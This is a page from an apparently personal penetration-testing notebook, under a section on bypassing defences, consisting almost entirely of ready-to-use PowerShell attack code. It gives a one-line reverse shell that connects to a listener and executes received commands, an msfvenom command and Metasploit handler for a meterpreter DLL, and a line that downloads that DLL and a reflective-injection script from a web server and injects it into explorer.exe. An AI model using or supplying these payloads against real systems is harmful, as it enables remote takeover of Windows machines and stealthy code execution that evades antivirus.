🤯
Hacker Mind
  • Penetration Testing Notes
    • 00 - Kali Linux Preparation
    • Page 1
    • Web Application (80/443)
      • XSS
      • LFI / Path Traversal
      • Wordpress
    • SMB (445)
    • LDAP
    • MSRPC (135)
    • MSSQL
    • Kerberos (88/tcp)
    • DNS (53)
    • IPv6
    • Import Nessus to Metasploit
  • STUCK? Look at this :D
  • Buffer Overflow
    • WinDbg
    • BoF Script Python
  • Active Directory Recon
    • Username Generation
    • PowerView
    • BloodHound
    • Flooding Attack
  • Payload
    • Sendemail
    • Phishing Payload
    • Bypass All The Things
      • AppLocker
      • MSBuild Shell
      • C# Runner
      • Payload Mod
      • Powershell
      • Bypass AV Linux
        • C Runner
  • Exploit
    • Brute Force
    • File Upload
    • Cracking
    • Shell & Stabilization
    • Database
    • MSSQL Injection
  • Tradecraft
    • Invoke-ReflectivePEInjection
  • Metasploit
    • Meterpreter Tricks
  • Privilege Escalation
    • Lateral Movement
    • Linux
    • Windows
  • Post Exploit
    • Active Directory
      • Kerberos
      • ACLs/ACEs
      • DCSync
      • Golden Ticket with krbtgt
      • LAPS
      • Page
      • Impersonate Token
    • Pivoting
      • Pivot in a Case
    • Transfer File
    • Exfiltration
    • Persistence
  • WiFi Pentesting
    • WPA-PSK
    • WPA-E (hostapd)
    • Attack WEP
    • Evil Twin - Wi-Fi
    • WPA3 Downgrade
  • Hardware Hacking
    • Information Gathering
  • Practice & Lab
Powered by GitBook
On this page
  • Reverse Shell
  • Run Remote DLL File
  1. Payload
  2. Bypass All The Things

Powershell

Reverse Shell

save it to drop.ps1

$client = New-Object System.Net.Sockets.TCPClient('192.168.56.106',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte =
([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Run Remote DLL File

Reflective DLL Injection in Powershell

generate DLL

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.x.x LPORT=443 EXITFUNC=thread -f dll > shell.dll
sudo msfconsole -x "use exploit/multi/handler;set payload windows/x64/meterpreter/reverse_tcp;set LHOST 192.168.x.y;set LPORT 443;run;"

don't forget to set your shell.dll and Invoke-ReflectionPEInjection.ps1 in http server.

$apple = (New-Object System.Net.webClient).DownloadData('http://192.168.x.y/shell.dll'); $procid = (Get-Process -name explorer).Id;IEX (New-Object Net.WebClient).DownloadString('http://192.168.x.x/Invoke-ReflectivePEInjection.ps1');Invoke-ReflectivePEInjection -PEBytes $apple -ProcId $procid

PreviousPayload ModNextBypass AV Linux

Last updated 6 months ago